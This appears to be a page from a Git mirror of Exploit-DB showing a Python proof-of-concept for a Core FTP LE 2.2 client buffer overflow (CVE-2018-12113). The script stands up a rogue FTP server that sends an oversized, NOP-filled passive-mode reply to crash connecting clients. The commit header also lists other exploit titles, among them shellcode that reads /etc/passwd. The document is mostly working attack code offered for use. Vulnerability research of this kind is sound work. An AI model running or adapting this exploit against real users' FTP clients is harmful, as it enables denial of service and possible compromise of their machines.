bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/44958.py
Offensive Security e8a3702c6c DB: 2018-07-03 
11 changes to exploits/shellcodes

Core FTP LE 2.2 - Buffer Overflow (PoC)
SIPp 3.6 - Local Buffer Overflow (PoC)
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)

Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection
FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)
Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)

Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection
DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection

Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
2018-07-03 05:01:48 +00:00

50 lines
No EOL
1.3 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Core FTP LE 2.2 - Buffer Overflow (PoC)
# Date: 2018-06-28
# Exploit Author: Berk Cem Göksel
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download
# Version: Core FTP Client LE v2.2 Build 1921
# Tested on: Windows 10
# Category: Dos
# CVE : CVE-2018-12113
# coding: utf-8
# Description:]
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
#!/usr/bin/env python
import socket
IP = '0.0.0.0'
port = 21
Stack_beginning = 3004
buff = "\x90" * (3004)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send('215 UNIX Type: L8\r\n')
print conn.recv(1024)
conn.send('257 "/" is current directory.\r\n')
print conn.recv(1024)
conn.send('227 Entering Passive Mode (' + buff + ')\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')
Reference in a new issue View git blame Copy permalink